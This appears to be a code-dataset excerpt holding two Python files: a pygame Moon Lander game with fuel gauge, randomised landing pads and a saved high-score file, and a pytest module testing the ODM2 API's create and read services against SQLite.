text stringlengths 957 885k |
|---|
#Moon Lander, where we try to land in 1 of the 3 landing pads, and keep speed under 2 m/s
import pygame
from pygame.locals import *
import sys
import random
import pygwidgets
import pyghelpers
# Color palette (RGB tuples).
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
ORANGE = (255, 100, 0)
GREENISH_YELLOW = (150, 255, 0)
GREENISH = (10,200,125)
# Window geometry (pixels).
WINDOW_WIDTH = 1600
WINDOW_HEIGHT = 900
MAX_WIDTH = WINDOW_WIDTH - 100
MAX_HEIGHT = WINDOW_HEIGHT - 100
FRAMES_PER_SECOND = 30
MOON_START = WINDOW_HEIGHT - 50  # y coordinate where the lunar surface begins
# Landing outcome states.
LANDED_SAFE = 'landedSafe'
LANDED_WITH_INJURIES = 'landedWithInjuries'
LANDED_CRASHED = 'landedCrashed'
LANDED_NOT = 'landedNot'
# Overall game states.
GAME_FLYING = 'gameFlying'
GAME_JUST_LANDED = 'gameJustLanded'
GAME_SHOWING_DIALOG = 'gameShowingDialog'
# CONSTANTS
LANDER_MASS = 1
LANDER_FUEL = 100
SPEED_LIMIT = 2.00  # maximum vertical speed (m/s) for a non-crash landing
PLANET_MASS = 7.347 * (10 ** 8)
PLANET_RADIUS = 1.079
GRAVITY_CONSTANT = 6.673 * (10 ** -11)
# Per-frame downward acceleration, from Newton's law of gravitation.
GRAVITY = (GRAVITY_CONSTANT * LANDER_MASS * PLANET_MASS)/ (PLANET_RADIUS ** 2)
class FuelGauge(object):
    """On-screen fuel gauge: a colored frame plus a thermometer-style bar.

    The frame color shifts from green toward red as fuel runs low, and the
    white bar's width tracks the remaining fuel (0-100 maps to 0-100 px).
    """

    def __init__(self, window):
        self.window = window
        # Outer colored frame, black bar background, and the white fill bar.
        self.outerRect = pygame.Rect(725, WINDOW_HEIGHT - 30, 150, 40)
        self.thermometerRange = pygame.Rect(750 - 1, WINDOW_HEIGHT - 15, 102, 12)
        self.thermometer = pygame.Rect(750, WINDOW_HEIGHT - 14, 100, 10)
        self.fuelDisplay = pygwidgets.DisplayText(window, (750, WINDOW_HEIGHT - 28), '',
                                                  fontSize=20, textColor=BLACK)

    def mDraw(self, fuelAmount):
        """Draw the gauge for the given fuel amount (clamped at zero)."""
        if fuelAmount < 0:
            fuelAmount = 0
        self.thermometer.width = int(fuelAmount)
        self.fuelDisplay.setValue('Fuel: ' + str(fuelAmount))
        # Choose the frame color from the fuel level.
        # Fixed: this chain previously read the module-level `landerFuel`
        # global instead of the fuelAmount parameter it was handed.
        if fuelAmount >= 90:
            color = GREEN
        elif fuelAmount > 65:
            color = GREENISH_YELLOW
        elif fuelAmount > 45:
            color = YELLOW
        elif fuelAmount > 10:
            color = ORANGE
        else:
            color = RED
        pygame.draw.rect(self.window, color, self.outerRect, 0)
        self.fuelDisplay.draw()
        pygame.draw.rect(self.window, BLACK, self.thermometerRange, 0)
        # Skip the fill bar entirely when the tank is empty.
        if fuelAmount > 0:
            pygame.draw.rect(self.window, WHITE, self.thermometer, 0)
class LandingPad(object):
    """One landing pad on the lunar surface, with a score bonus for landing
    on it and a random position/width chosen at each reset."""
    HEIGHT = 10

    def __init__(self, window, landingBonus, color, minX, maxX, maxWidth, minWidth):
        self.window = window
        self.color = color
        self.landingBonus = landingBonus
        # Limits used when randomizing the pad's placement and size.
        self.minX = minX
        self.maxX = maxX
        self.maxWidth = maxWidth
        self.minWidth = minWidth
        self.mReset()

    def mReset(self):
        """Pick a fresh random horizontal position and width for this pad."""
        newLeft = random.randrange(self.minX, self.maxX)
        newWidth = random.randrange(self.minWidth, self.maxWidth)
        self.rect = pygame.Rect(newLeft, MOON_START - 5, newWidth, LandingPad.HEIGHT)

    def mIntersects(self, landerRect):
        """Return (touching, fullyInside) for the given lander rect."""
        if not landerRect.colliderect(self.rect):
            # Not touching the pad at all, so certainly not a safe landing.
            return False, False
        # Touching; safe only if the lander sits entirely within the pad.
        fullyInside = (landerRect.left >= self.rect.left) and \
                      ((landerRect.left + landerRect.width) <= self.rect.left + self.rect.width)
        return True, fullyInside

    def mGetBonus(self):
        """Score bonus awarded for landing on this pad."""
        return self.landingBonus

    def mDraw(self):
        pygame.draw.ellipse(self.window, self.color, self.rect, 0)
class LandingPadMgr(object):
    """Owns the three landing pads and answers landing queries for them."""

    def __init__(self, window, minWidth):
        # Two small high-bonus pads at the edges, one wide low-bonus pad in
        # the middle (made larger for easy landing).
        self.landingPadList = [
            LandingPad(window, 75, YELLOW, 1, 300, 85, minWidth),
            LandingPad(window, 50, GREEN, 400, 1150, 160, minWidth + 15),
            LandingPad(window, 75, YELLOW, 1300, 1525, 85, minWidth),
        ]
        self.mReset()

    def mReset(self):
        """Re-randomize the size and position of every pad."""
        for thisPad in self.landingPadList:
            thisPad.mReset()

    def mCheckForLanding(self, landerRect):
        """Return (bonus, insidePad); bonus is 0 when no pad was touched."""
        for thisPad in self.landingPadList:
            touched, insidePad = thisPad.mIntersects(landerRect)
            if touched:
                return thisPad.mGetBonus(), insidePad
        return 0, False  # signal that it did not land

    def mGetBonus(self, whichLandingPad):
        """Bonus for the pad at the given index (also cached on self)."""
        self.bonus = self.landingPadList[whichLandingPad].mGetBonus()
        return self.bonus

    def mDraw(self):
        for thisPad in self.landingPadList:
            thisPad.mDraw()
class StarField(object):
    """Background scenery: randomly placed stars plus an Earth image."""

    def __init__(self, window):
        self.window = window
        self.mReset()
        self.earth = pygame.image.load("images/earth.jpg")

    def mReset(self):
        """Re-randomize the stars and the Earth's position."""
        self.starInfo = []  # list of ((x, y), radius) tuples
        nStars = random.randrange(25, 50)
        for i in range(nStars):
            x = random.randrange(0, WINDOW_WIDTH)
            y = random.randrange(0, MOON_START)  # keep stars above the surface
            radius = random.randrange(1, 4)
            self.starInfo.append(((x, y), radius))
        self.earthLeft = random.randrange(0, WINDOW_WIDTH)
        self.earthTop = random.randrange(0, MOON_START)

    def mDraw(self):
        # Fixed: previously drew to the module-level `window` global instead
        # of the surface this object was constructed with.
        for center, radius in self.starInfo:
            pygame.draw.circle(self.window, WHITE, center, radius)
        self.window.blit(self.earth, (self.earthLeft, self.earthTop))
class Lander(object):
    """The player's lander: per-frame physics, fuel, engine sounds, drawing."""
    STARTING_FUEL = 100
    MIN_X = 100
    MAX_X = WINDOW_WIDTH - 100
    START_Y = 2.0

    def __init__(self, window):
        self.window = window
        # Images for the three possible end states, plus the jet flames.
        self.imageOK = pygame.image.load("images/lander.png")
        self.imageCrashed = pygame.image.load("images/landerCrashed.png")
        self.imageInjuries = pygame.image.load("images/landerInjuries.png")
        self.rect = self.imageOK.get_rect()
        self.leftJet = pygame.image.load("images/jetLeft.png")
        self.rightJet = pygame.image.load("images/jetRight.png")
        self.mainJet = pygame.image.load("images/jetMain.png")
        # Edge arrows shown when the lander drifts off screen.
        self.leftArrow = pygame.image.load("images/arrowLeft.png")
        self.leftArrowLeft = 2
        self.leftArrowTop = WINDOW_HEIGHT / 2
        self.rightArrow = pygame.image.load("images/arrowRight.png")
        self.rightArrowLeft = WINDOW_WIDTH - 47  # so it shows on window
        self.rightArrowTop = WINDOW_HEIGHT / 2
        self.upArrow = pygame.image.load("images/arrowUp.png")
        self.upArrowLeft = WINDOW_WIDTH / 2
        self.upArrowTop = 2
        self.mReset()

    def mReset(self):
        """Start a new flight: full fuel, random x position and drift."""
        self.image = self.imageOK
        self.fuel = Lander.STARTING_FUEL
        # Need these as floating point, because speed increments are decimal values
        self.xSpeed = float(random.randrange(-5, 6))
        self.ySpeed = 0.0
        self.landerX = float(random.randrange(Lander.MIN_X, Lander.MAX_X))
        self.landerY = Lander.START_Y  # was a hard-coded 2.0; same value
        self.rect.left = int(self.landerX)
        self.rect.top = int(self.landerY)
        self.landed = False
        self.leftEngineOn = False
        self.rightEngineOn = False
        self.mainEngineOn = False
        self.jetSoundPlaying = False
        # Fixed: was initialized to True, falsely claiming the engine sound
        # was already playing before it had ever been started.
        self.engineSoundPlaying = False

    def mUpdate(self, moveLeftEngineOn, moveRightEngineOn, mainEngineOn):
        """Advance one frame of physics.

        Applies thrust for each engine that is on (burning fuel and managing
        the looping jet/engine sounds), then gravity, then integrates the
        position.  Returns (rect, xSpeed, ySpeed).
        """
        self.leftEngineOn = moveLeftEngineOn
        self.rightEngineOn = moveRightEngineOn
        self.mainEngineOn = mainEngineOn
        # Stop looped sounds whose engines were just released.
        if self.jetSoundPlaying and (not moveRightEngineOn) and (not moveLeftEngineOn):
            jetSound.stop()
            self.jetSoundPlaying = False
        if self.engineSoundPlaying and (not mainEngineOn):
            engineSound.stop()
            self.engineSoundPlaying = False
        if self.fuel > 0:
            if self.leftEngineOn:
                self.xSpeed = self.xSpeed - .1
                self.fuel = self.fuel - .25
                if not self.jetSoundPlaying:
                    jetSound.play(-1)  # continuous
                    self.jetSoundPlaying = True
            if self.rightEngineOn:
                self.xSpeed = self.xSpeed + .1
                self.fuel = self.fuel - .25
                if not self.jetSoundPlaying:
                    jetSound.play(-1)
                    self.jetSoundPlaying = True
            if self.mainEngineOn:
                self.ySpeed = self.ySpeed - .25
                self.fuel = self.fuel - 1
                if not self.engineSoundPlaying:
                    engineSound.play(-1)  # continuous
                    self.engineSoundPlaying = True
        else:
            # Out of fuel: all engines are dead regardless of the keys held.
            self.leftEngineOn = False
            self.rightEngineOn = False
            self.mainEngineOn = False
        self.landerX = self.landerX + self.xSpeed
        self.ySpeed = self.ySpeed + GRAVITY
        self.landerY = self.landerY + self.ySpeed
        self.rect.left = int(self.landerX)
        self.rect.top = int(self.landerY)
        return self.rect, self.xSpeed, self.ySpeed

    def mDown(self, landedState):  # Lander has landed, may have crashed
        """Freeze the lander on the ground, pick its end-state image, and
        silence any looping sounds."""
        if landedState == LANDED_CRASHED:
            self.image = self.imageCrashed
        elif landedState == LANDED_WITH_INJURIES:
            self.image = self.imageInjuries
        self.ySpeed = 0  # (was assigned twice; once is enough)
        self.leftEngineOn = False
        self.rightEngineOn = False
        self.mainEngineOn = False
        if self.jetSoundPlaying:
            jetSound.stop()
            self.jetSoundPlaying = False
        if self.engineSoundPlaying:
            engineSound.stop()
            self.engineSoundPlaying = False

    def mGetWidth(self):
        return self.rect.width

    def mDraw(self):
        # Show arrows if off window
        if self.rect.left < 0:
            self.window.blit(self.leftArrow, (self.leftArrowLeft, self.leftArrowTop))
        if self.rect.left > WINDOW_WIDTH:
            self.window.blit(self.rightArrow, (self.rightArrowLeft, self.rightArrowTop))
        if self.rect.top < 0:
            self.window.blit(self.upArrow, (self.upArrowLeft, self.upArrowTop))
        # Draw the lander, and any jets that are on.  The left engine shows
        # the right-side jet image (and vice versa) — presumably the flame
        # exits opposite the thrust direction.
        self.window.blit(self.image, self.rect)
        if self.leftEngineOn:
            self.window.blit(self.rightJet, (self.rect.left, self.rect.top))
        if self.rightEngineOn:
            self.window.blit(self.leftJet, (self.rect.left, self.rect.top))
        if self.mainEngineOn:
            self.window.blit(self.mainJet, (self.rect.left, self.rect.top))

    def mGetFuel(self):
        return self.fuel

    def mGetYSpeed(self):
        return self.ySpeed
#Initialize pygame
pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
pygame.init()
window= pygame.display.set_mode([WINDOW_WIDTH, WINDOW_HEIGHT])
# Fonts (note: these SysFont objects are created but the widgets below use
# pygwidgets' own fontSize arguments).
gameFont = pygame.font.SysFont("monospaces", 30)
endFont = pygame.font.SysFont("monospaces", 60)
fuelFont = pygame.font.SysFont("monospaces", 20)
# Game objects.
oLander = Lander(window)
minLandingPadSize = oLander.mGetWidth() + 5  # pads must fit the lander
oLandingPadMgr = LandingPadMgr(window, minLandingPadSize)
oStarField = StarField(window)
oFuelGauge = FuelGauge(window)
# Initial state machine values.
gameState = GAME_FLYING
landedState = LANDED_NOT
# Score
score = 0
#The ground
moon = pygame.image.load("images/moon.png")
austronaut = pygame.image.load("images/astronaut.png")
# In-game status line widgets (speeds, score, elapsed-time).
liveSpeedX = pygwidgets.DisplayText(window, (500, MOON_START + 20), '', \
             fontSize=30, textColor=GREEN)
liveSpeedY = pygwidgets.DisplayText(window, (900, MOON_START + 20), '', \
             fontSize=30, textColor=GREEN)
scoreText = pygwidgets.DisplayText(window, (10, MOON_START + 20), '', \
            fontSize=30, textColor=GREEN)
countUpTimerField = pygwidgets.DisplayText(window, (WINDOW_WIDTH - 150, MOON_START + 20, ), '0', \
                    fontSize=30, textColor=GREEN)
# Stuff dealing with dialog box when one round of the game is done
messageDisplay = pygwidgets.DisplayText(window, (565, 290), '', \
                 fontSize=48, textColor=BLACK)
speedDisplay = pygwidgets.DisplayText(window, (565, 340), '', \
               fontSize=48, textColor=BLACK)
newSoftestField = pygwidgets.DisplayText(window, (565, 390), '', \
                  fontSize=48, textColor=BLACK)
newFastestField = pygwidgets.DisplayText(window, (565, 440), '', \
                  fontSize=48, textColor=BLACK)
playAgainDisplay = pygwidgets.DisplayText(window, (690, 550), 'Play again?', \
                   fontSize=48, textColor=BLACK)
startButton = pygwidgets.TextButton(window, (750, 610), 'Start', width=60, height=30)
yesButton = pygwidgets.TextButton(window, (720, 610), 'Yes', width=60, height=30)
noButton = pygwidgets.TextButton(window, (820, 610), 'No', width=60, height=30)
DATA_FILE_PATH = 'LanderData.txt'
# Data file will be made of two entries - separated by a comma:
# <softestSoFar>,<fastestSoFar>
if pyghelpers.fileExists(DATA_FILE_PATH):
    savedDataString = pyghelpers.readFile(DATA_FILE_PATH)
    savedDataList = savedDataString.split(',')
    softestSoFar = float(savedDataList[0])
    fastestSoFar = float(savedDataList[1])
else: #first time, set some outrageous values
    softestSoFar = 10000.
    fastestSoFar = 10000.
oCountUpTimer = pyghelpers.CountUpTimer()
clock = pygame.time.Clock() # set the speed (frames per second)
introwindow = pygame.image.load("images/introscreen.png")
# Sound effects: looping jet/engine sounds plus one-shot landing results.
jetSound = pygame.mixer.Sound('sounds/jet.wav')
engineSound = pygame.mixer.Sound('sounds/engine.wav')
landedSafelySound = pygame.mixer.Sound('sounds/landedSafely.wav')
crashMinorSound = pygame.mixer.Sound('sounds/crashMinor.wav')
crashMajorSound = pygame.mixer.Sound('sounds/crashMajor.wav')
## Intro window:
# Show the intro screen over the game scenery until Start is pressed.
waitingToPressStart = True
while waitingToPressStart:
    for event in pygame.event.get():
        # check if the event is the X button
        if event.type == pygame.QUIT:
            # if it is quit the game
            pygame.quit()
            sys.exit()
        if startButton.handleEvent(event):
            # Reset everything for a fresh round and leave the intro loop.
            oLander.mReset()
            oLandingPadMgr.mReset()
            oStarField.mReset()
            gameState = GAME_FLYING
            landedState = LANDED_NOT
            oCountUpTimer.start()
            waitingToPressStart = False # start up
    # Draw star field, moon, control text, landing pads, lander, and control text
    oStarField.mDraw()
    window.blit(moon, (0, MOON_START))
    landerFuel = oLander.mGetFuel()
    oFuelGauge.mDraw(landerFuel)
    scoreText.draw()
    oLandingPadMgr.mDraw()
    oLander.mDraw()
    window.blit(introwindow, (400, 200))
    startButton.draw()
    # update the window
    pygame.display.update()
    # slow things down a bit
    clock.tick(FRAMES_PER_SECOND) # make PyGame wait the correct amount
## MAIN PLAYING LOOP
# 4 - Loop forever
while True:
    # 5 - loop through the events
    for event in pygame.event.get():
        # check if the event is the X button
        if event.type == pygame.QUIT:
            # if it is quit the game
            pygame.quit()
            sys.exit()
    # NOTE(review): the dialog handling below reads `event` after the for
    # loop finishes, i.e. only the last event of the frame (or a stale one on
    # an empty queue).  The source indentation was ambiguous — confirm this
    # matches the original structure.
    if gameState == GAME_SHOWING_DIALOG:
        if yesButton.handleEvent(event):
            # Play again: reset everything and restart the timer.
            oLander.mReset()
            oLandingPadMgr.mReset()
            oStarField.mReset()
            gameState = GAME_FLYING
            landedState = LANDED_NOT
            oCountUpTimer.start()
        if noButton.handleEvent(event):
            pygame.quit()
            sys.exit()
    else: # not landed
        #Moving the lander
        keyPressedList = pygame.key.get_pressed()
        landerRect, landerXSpeed, landerYSpeed = oLander.mUpdate(keyPressedList[pygame.K_LEFT], keyPressedList[K_RIGHT], keyPressedList[K_UP])
        landerXSpeed = round(landerXSpeed, 4)
        landerYSpeed = round(landerYSpeed, 4)
        bonusForLandingOnPad, landedInsidePad = oLandingPadMgr.mCheckForLanding(landerRect) # 0 if not landed, otherwise bonus
        if bonusForLandingOnPad > 0:
            # Touched a pad: classify the landing by speed and position.
            gameState = GAME_JUST_LANDED
            if landerYSpeed < SPEED_LIMIT:
                if landedInsidePad :
                    landedState = LANDED_SAFE
                    score = score + bonusForLandingOnPad
                else:
                    landedState = LANDED_WITH_INJURIES
            else:
                landedState = LANDED_CRASHED
                score = score - 10
            oLander.mDown(landedState)
            oCountUpTimer.stop()
        if gameState == GAME_FLYING: #check for collision on moon
            if (landerRect.top + landerRect.height) > MOON_START:
                # Hit the surface outside every pad: always a crash.
                gameState = GAME_JUST_LANDED
                score = score - 10
                landedState = LANDED_CRASHED
                oLander.mDown(landedState)
                oCountUpTimer.stop()
        if gameState == GAME_FLYING:
            liveSpeedX.setValue('Hor. Speed: ' + str(landerXSpeed) + ' m/s')
            liveSpeedY.setValue('Vert. Speed: ' + str(landerYSpeed) + 'm/s')
        if gameState == GAME_JUST_LANDED: # only runs once
            liveSpeedX.setValue('')
            liveSpeedY.setValue('')
            # Announce the outcome with message text and a sound effect.
            if landedState == LANDED_SAFE:
                messageDisplay.setValue('Safe landing!')
                landedSafelySound.play()
            elif landedState == LANDED_WITH_INJURIES:
                messageDisplay.setValue('Landed, but there are injuries')
                crashMinorSound.play()
            else: # LANDED_CRASHED
                messageDisplay.setValue('Crashed! No survivors')
                crashMajorSound.play()
            speedDisplay.setValue('Landing speed: ' + str(landerYSpeed))
            writeDataFile = False
            newSoftestField.setValue('')
            newFastestField.setValue('')
            # Record new personal bests only for survivable pad landings.
            if (bonusForLandingOnPad > 0) and (landedState != LANDED_CRASHED):
                if landerYSpeed < softestSoFar:
                    softestSoFar = landerYSpeed
                    newSoftestField.setValue('New softest landing: ' + str(softestSoFar))
                    writeDataFile = True
                seconds = oCountUpTimer.getTime()
                if seconds < fastestSoFar:
                    fastestSoFar = seconds
                    newFastestField.setValue('New fastest landing: ' + str(fastestSoFar))
                    writeDataFile = True
                if writeDataFile:
                    dataList = [str(softestSoFar), str(fastestSoFar)]
                    dataString = ','.join(dataList)
                    print('Writing file')
                    pyghelpers.writeFile(DATA_FILE_PATH, dataString)
            gameState = GAME_SHOWING_DIALOG
    scoreText.setValue("Score: " + str(score))
    sec = oCountUpTimer.getTime() # ask the clock object for the elapsed time
    countUpTimerField.setValue('Time: ' + str(sec)) # put that into a text field
    # 6 - clear the window before drawing it again
    window.fill(BLACK)
    # Draw star field, moon, control text, landing pads, lander, and control text
    oStarField.mDraw()
    window.blit(moon, (0, MOON_START))
    landerFuel = oLander.mGetFuel()
    oFuelGauge.mDraw(landerFuel)
    liveSpeedX.draw()
    liveSpeedY.draw()
    scoreText.draw()
    countUpTimerField.draw()
    oLandingPadMgr.mDraw()
    oLander.mDraw()
    if gameState == GAME_SHOWING_DIALOG:
        # End-of-round dialog on a white panel.
        pygame.draw.rect(window, WHITE, (400, 200, 800, 500))
        if landedState == LANDED_SAFE:
            window.blit(austronaut, (oLander.rect.left + 50, MOON_START - 18))
            newSoftestField.draw()
            newFastestField.draw()
        elif landedState == LANDED_WITH_INJURIES:
            newSoftestField.draw()
            newFastestField.draw()
        else: # LANDED_CRASHED
            pass # nothing
        messageDisplay.draw()
        speedDisplay.draw()
        playAgainDisplay.draw()
        yesButton.draw()
        noButton.draw()
    # 8 - update the window
    pygame.display.update()
    # 9 slow things down a bit
    clock.tick(FRAMES_PER_SECOND) # make PyGame wait the correct amount
|
<reponame>LimnoTech/ODM2PythonAPI
from __future__ import (absolute_import, division, print_function)
from odm2api.ODMconnection import dbconnection
from odm2api.models import (Methods, Models, People,
ProcessingLevels, RelatedModels, Variables)
from odm2api.services.createService import CreateODM2
from odm2api.services.deleteService import DeleteODM2
from odm2api.services.readService import ReadODM2
from odm2api.services.updateService import UpdateODM2
import pytest
from tests import test_connection as testConnection
__author__ = ['<NAME>', '<NAME>']

# Convenience aliases for the pytest markers used throughout this module.
xfail = pytest.mark.xfail
# Fixed: was `skipif = xfail = pytest.mark.skipif`, which silently rebound
# the `xfail` alias defined above to the skipif marker.
skipif = pytest.mark.skipif

dbs = testConnection.dbs_test
class odmConnection():
    """Empty holder the `setup` fixture hangs the ODM2 service objects on."""
    pass
@pytest.fixture(scope='function', params=dbs)
def setup(request):
    """Per-test fixture: connect to each configured test database and expose
    read/create/update/delete service objects on a shared connection holder.

    Parametrized over every connection tuple in ``dbs``; for in-memory SQLite
    the ODM2 schema is built from the bundled SQL script before returning.
    """
    # build an empty database for testing
    # conn = dbconnection.createConnection('sqlite', ':memory:')
    db = request.param
    print('dbtype', db[0], db[1])
    session_factory = dbconnection.createConnection(db[1], db[2], db[3], db[4], db[5], echo=False)
    assert session_factory is not None, ('failed to create a session for ', db[0], db[1])
    assert session_factory.engine is not None, ('failed: session has no engine ', db[0], db[1])
    # dbconnection._setSchema(conn.engine)
    # NOTE(review): this binds the class object itself, not an instance, so
    # the service attributes below are shared class-level state — confirm
    # that is intended.
    dbConn = odmConnection
    # build connectors for read, write, update, and delete operations
    dbConn.odmread = ReadODM2(session_factory)
    dbConn.odmcreate = CreateODM2(session_factory)
    dbConn.odmupdate = UpdateODM2(session_factory)
    dbConn.odmdelete = DeleteODM2(session_factory)
    s = session_factory.getSession()
    if (db[2] == ':memory:'):
        # In-memory SQLite starts empty: replay the schema DDL one statement
        # at a time (the script separates statements with ';\n').
        build = open('./tests/schemas/sqlite/ODM2_for_SQLite.sql').read()
        for line in build.split(';\n'):
            s.execute(line)
        s.flush()
    print('database initialization completed successfully')
    def fin():
        # Teardown: drop the service objects, then dispose of the engines
        # and invalidate the session.
        print('teardown odm2 test connection')
        del dbConn.odmread
        del dbConn.odmcreate
        del dbConn.odmupdate
        del dbConn.odmdelete
        session_factory.engine.dispose()
        session_factory.test_engine.dispose()
        s.invalidate()
    request.addfinalizer(fin)
    return dbConn
@pytest.mark.skipif(True, reason='Enable for testing: CreateService Session closes on failed create #52')
def test_SessionNotFailed(setup):
    """Regression check for issue #52: a failed create must not kill the
    session — subsequent creates should still succeed."""
    setup.odmcreate.createPerson(
        firstName='tony',
        lastName='castronova',
        middleName='michael'
    )
    with pytest.raises(Exception) as excinfo:
        # this one should fail due to a not null constraint
        setup.odmcreate.createPerson(firstName=None,
                                     lastName='castronova',
                                     middleName='michael')
    assert 'NULL' in str(excinfo.value)
    # now add again
    setup.odmcreate.createPerson(firstName='tony',
                                 lastName='castronova',
                                 middleName=None)
    setup.odmcreate.createPerson(
        firstName='john',
        lastName='doe'
    )
    people = setup.odmread.getPeople()
    assert len(people) == 3, 'People should have been 3'
def test_createPerson(setup):
    """Insert three People records and confirm all three read back."""
    newPeople = [
        People(PersonFirstName='tony', PersonLastName='castronova', PersonMiddleName='Michael'),
        People(PersonFirstName='tony', PersonLastName='castronova'),
        People(PersonFirstName='john', PersonLastName='doe'),
    ]
    for person in newPeople:
        setup.odmcreate.createPerson(person)
    people = setup.odmread.getPeople()
    assert len(people) == 3, 'People should have been 3'
def test_personFail(setup):
    """createPerson must reject a null first name (NOT NULL constraint)."""
    with pytest.raises(Exception) as excinfo:
        badPerson = People(PersonFirstName=None, PersonLastName='doe', PersonMiddleName='john')
        setup.odmcreate.createPerson(badPerson)
    assert 'null' in str(excinfo.value).lower()
def test_createVariable(setup):
    """Create three distinct Variables, read them back, then verify that a
    duplicate VariableCode violates the unique constraint."""
    shared = dict(VariableNameCV='Phosphorus, total dissolved',
                  VariableTypeCV='Hydrology',
                  NoDataValue=-999)
    # create some variables
    setup.odmcreate.createVariable(
        Variables(VariableCode='Phos_TOT', SpeciationCV=None,
                  VariableDefinition=None, **shared))
    setup.odmcreate.createVariable(
        Variables(VariableCode='Phos_TOT2', SpeciationCV='mg/L',
                  VariableDefinition=None, **shared))
    setup.odmcreate.createVariable(
        Variables(VariableCode='Phos_TOT3', SpeciationCV=None,
                  VariableDefinition='some definition', **shared))
    variables = setup.odmread.getVariables()
    print(variables)
    assert len(variables) == 3
    with pytest.raises(Exception) as excinfo:
        # insert duplicate
        setup.odmcreate.createVariable(
            Variables(VariableCode='Phos_TOT', SpeciationCV=None,
                      VariableDefinition=None, **shared))
    assert 'unique' in str(excinfo.value).lower()
def test_createMethod(setup):
    """Insert three Methods (varying description / organization) and confirm
    all three read back."""
    methodSpecs = [
        ('mycode', 'method description', None),
        ('mycode2', 'method description', 1),
        ('mycode3', None, None),
    ]
    for code, description, orgID in methodSpecs:
        setup.odmcreate.createMethod(
            Methods(MethodCode=code,
                    MethodName='my test method',
                    MethodTypeCV='Unknown',
                    MethodDescription=description,
                    MethodLink=None,
                    OrganizationID=orgID))
    methods = setup.odmread.getMethods()
    assert len(methods) == 3
def test_ProcessingLevel(setup):
    """Insert one ProcessingLevel and confirm it reads back."""
    newLevel = ProcessingLevels(ProcessingLevelCode='testlevel',
                                Definition='this is a test processing level',
                                Explanation=None)
    setup.odmcreate.createProcessingLevel(newLevel)
    assert len(setup.odmread.getProcessingLevels()) == 1
@skipif(True, reason='Needs data')
def test_createSamplingFeature(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getSamplingFeatures()) == 1
@skipif(True, reason='Needs data')
def test_createUnit(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getUnits()) == 1
@skipif(True, reason='Needs data')
def test_createOrganization(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getOrganizations()) == 1
@skipif(True, reason='Needs data')
def test_createAffiliation(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getAffiliationsByPerson()) == 1
@skipif(True, reason='Needs data')
def test_createDataset(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getDataSets()) == 1
@skipif(True, reason='Needs data')
def test_createDatasetResults(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getProcessingLevels()) == 1
@skipif(True, reason='Needs data')
def test_createAction(setup):
    """Placeholder: fails on purpose until the read service gains getActions."""
    # todo: this function is missing
    # res = self.odmread.getActions()
    assert 0 == 1
@skipif(True, reason='Needs data')
def test_createActionBy(setup):
    """Placeholder: fails on purpose until the read service gains getActionsBy."""
    # todo; this function is missing
    # res = self.odmread.getActionsBy()
    assert 0 == 1
@skipif(True, reason='Needs data')
def test_createFeatureAction(setup):
    """Placeholder: fails on purpose until the read service gains getFeatureActions."""
    # todo: this function is missing
    # res = self.odmread.getFeatureActions()
    assert 0 == 1
@skipif(True, reason='Needs data')
def test_createResult(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getResults()) == 1
@skipif(True, reason='Needs data')
def test_createTimeSeriesResult(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getTimeSeriesResults()) == 1
@skipif(True, reason='Needs data')
def test_createTimeSeriesResultValues(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getTimeSeriesResultValues()) == 1
@skipif(True, reason='Needs data')
def test_createSite(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getAllSites()) == 1
@skipif(True, reason='Needs data')
def test_createSpatialReference(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getSpatialReferenceByCode()) == 1
@skipif(True, reason='Needs data')
def test_createDeploymentAction(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getAllDeploymentAction()) == 1
def test_createModel(setup):
    """Insert two Models, read them back (all and by code), then verify that
    a duplicate ModelCode is rejected by the unique constraint."""
    firstModel = Models(ModelCode='converter',
                        ModelName='mymodel',
                        ModelDescription='my test converter')
    secondModel = Models(ModelCode='model2',
                         ModelName='mymodel',
                         ModelDescription=None)
    duplicateModel = Models(ModelCode='converter',
                            ModelName='mymodel2',
                            ModelDescription='my test model2')
    # create converter (expected: record inserted)
    setup.odmcreate.createModel(firstModel)
    # create with no description (expected: record inserted)
    setup.odmcreate.createModel(secondModel)
    allModels = setup.odmread.getModels()
    assert len(allModels) == 2
    byCode = setup.odmread.getModels(codes=['converter'])
    assert byCode is not None
    assert byCode[0].ModelCode == 'converter'
    with pytest.raises(Exception) as excinfo:
        # create converter with duplicate code (expected: fail to insert record)
        setup.odmcreate.createModel(duplicateModel)
    assert 'unique' in str(excinfo.value).lower()
def test_createRelatedModel(setup):
    """Create two models, relate them, and verify the relationship is only
    visible from the parent model's side."""
    # create a relationship type
    # NOTE(review): this seeds the CV term "coupled" but the RelatedModels
    # row below uses RelationshipTypeCV='Is part of' — confirm the mismatch
    # is intentional (i.e. 'Is part of' already exists in the CV table).
    setup.odmcreate.getSession().execute(
        'insert into cv_relationshiptype values ("coupled", "coupled converter", "models that have been coupled together", "modeling", NULL)' # noqa
    )
    mod1 = Models(ModelCode='converter',
                  ModelName='mymodel',
                  ModelDescription='my test converter')
    mod2 = Models(ModelCode='model2',
                  ModelName='mymodel',
                  ModelDescription='my test model2')
    # create converter (expected: record inserted)
    m1 = setup.odmcreate.createModel(mod1)
    # create converter (expected: record inserted)
    m2 = setup.odmcreate.createModel(mod2)
    rm = RelatedModels(ModelID=m1.ModelID,
                       RelatedModelID=m2.ModelID,
                       RelationshipTypeCV='Is part of')
    # create related records
    setup.odmcreate.createRelatedModel(rm)
    m1r = setup.odmread.getModels(codes=['converter'])
    assert m1r is not None
    assert m1r[0].ModelCode == 'converter'
    m2r = setup.odmread.getModels(codes=['model2'])
    assert m2r is not None
